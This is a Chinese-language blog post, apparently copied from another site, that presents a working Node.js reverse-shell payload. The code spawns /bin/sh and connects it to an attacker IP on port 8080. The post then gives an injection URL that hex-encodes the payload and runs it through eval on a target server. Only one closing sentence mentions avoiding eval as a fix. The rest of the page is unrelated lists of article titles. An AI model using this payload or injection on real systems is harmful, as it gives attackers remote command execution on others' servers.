Node.js反向Shell

摘自:http://www.itfang.net/?p=109

如下的Javascript就是一个Node.js的反向连接shell。

这个payload将会生成一个/bin/sh的shell,创建一个TCP连接到攻击者的服务器,并且在通信数据流中绑定shell命令。

(function(){var net = require("net"),cp = require("child_process"),sh = cp.spawn("/bin/sh", []);var client = new net.Socket();client.connect(8080, "10.17.26.64", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/; // Prevents the Node.js application form crashing
})();

为了优雅的执行payload,我们还需要一些小技巧,我们将反向连接shell的payload用16进制进行编码,然后再用Node.js的Buffer对象来对其进行解码操作。

http://target.tld/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"]

我们强烈的建议开发者们避免在JavaScript项目中使用eval函数,而修复的方法也很简单,直接使用RegExp对象来对数据进行操作即可。

JavaScript反向shell相关推荐

  1. 一款功能强大,可扩展端到端加密反向Shell的工具

    关于Mediator Mediator是一款功能强大的可扩展端到端加密反向Shell,该工具基于新型架构实现,采用Python语言开发,能够帮助广大研究人员通过一台"Mediator&quo ...

  2. 【 Grey Hack 】反向Shell

    目录 调查 准备反向shell 反向shell 提权 版本:Grey Hack v0.7.3618 - Alpha 如图,本案例中目标IP尚未开放常见端口 调查 通过路由器获得目标PC的用户邮箱账号和 ...

  3. 使用netcat的正向 / 反向shell

    reverse shell bind shell reverse shell描述图: 在此示例中,目标使用端口4444反向连接攻击主机.-e选项将Bash shell发回攻击主机.请注意,我们也可以在 ...

  4. 支持Python3、JavaScript、Shell、TypeScript 的定时任务管理面板项目

    今天要给大家分享的是一个支持Python3.JavaScript.Shell.TypeScript 的定时任务管理面板项目 有对定时任务感兴趣的小伙伴可以来瞅瞅,项目具备如下功能: 支持多种脚本语言( ...

  5. Shells:一款功能强大的反向Shell快速生成工具

    关于Shells Shells是一款功能强大的反向Shell快速生成工具,该工具由4ndr34z负责开发和维护,可以帮助广大研究人员轻松生成常用的反向Shell.如果你需要一种简单的方法来生成格式化的 ...

  6. 用python写一个程序控制其它软件_程序员:利用Python实现可控制肉鸡的反向Shell...

    一.初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为 Client 主动连接到我们的 Server 端,以实现对多个远程主机的 ...

  7. python控制摄像头拍照是反的_使用反向Shell控制摄像头

    原标题:使用反向Shell控制摄像头 如果你已经用胶条封住了你的网络摄像头,你可能是因为听说过黑客或NSA可以远程监视你.那么问题来了,这些你素未谋面人又是如何远程连接到你的机器并监视你的呢? 这可能 ...

  8. java反序列化漏洞POP查找_利用 Java 反序列化漏洞在受限环境下获取反向 Shell

    原标题:利用 Java 反序列化漏洞在受限环境下获取反向 Shell 原文链接: https://medium.com/abn-amro-red-team/java-deserialization-f ...

  9. 使用 JavaScript 编写 Shell 脚本

    作为程序员,在平时的开发中肯定少不了一些命令行操作了.当然,简单的命令大家都是可以拿捏的,但是涉及到一些逻辑的时候还是比较头疼的. Shell Shell 是一个用 C 语言编写的程序,它是用户使用 ...

最新文章

  1. java执行时的两个常见问题(无法加载主类)
  2. android KK版本号收到短信后,点亮屏的操作
  3. 奔跑了24年,中国零售业会员制到底该怎么玩?
  4. 引用变量和指针变量初探
  5. qt 安装mysql_qt 安装mysql数据库
  6. 机器视觉产品技术市场需求日益增长
  7. python中读取文本文件_利用Python读取文本文件?
  8. python for循环 内存_Python for循环中的内存错误
  9. MapReduce WordCount Combiner程序
  10. sprintf函数的用法
  11. 20考研率辉计算机复试(贪心法)
  12. 显著性水平 p值 z值
  13. iOS面试攻略,你必须拥有
  14. python解除windows锁屏_用python获取win10锁屏图片
  15. 华为服务器的系统,华为服务器 操作系统
  16. hadoop3 任务卡在map 0% reduce 0%的解决方案
  17. 1411-喜闻乐见的a+b ZCMU
  18. 噪音测试标准:行业标准
  19. 宝藏!揭秘如何写好软考论文框架1000+字
  20. DH算法在密钥交换中的作用简介

热门文章

  1. Java基础与数据库对应数据--Java基础2阶段
  2. curl_setopt函数相关应用及介绍
  3. 猫和老鼠服务器维护多久结束,猫和老鼠手游关服公告 告别是为了每次更好的遇见!...
  4. python设计模式15-解释器模式
  5. 如何对 Kubernetes 进行扩展
  6. PHP面向对象中new self( )和 new static( ) 的区别
  7. 小提琴机器人拉法_小提琴的拉琴姿势探讨
  8. 在字典中根据条件来筛选数据
  9. Redis解决秒杀中的超卖问题
  10. JavaScript中的call,apply,bind学习总结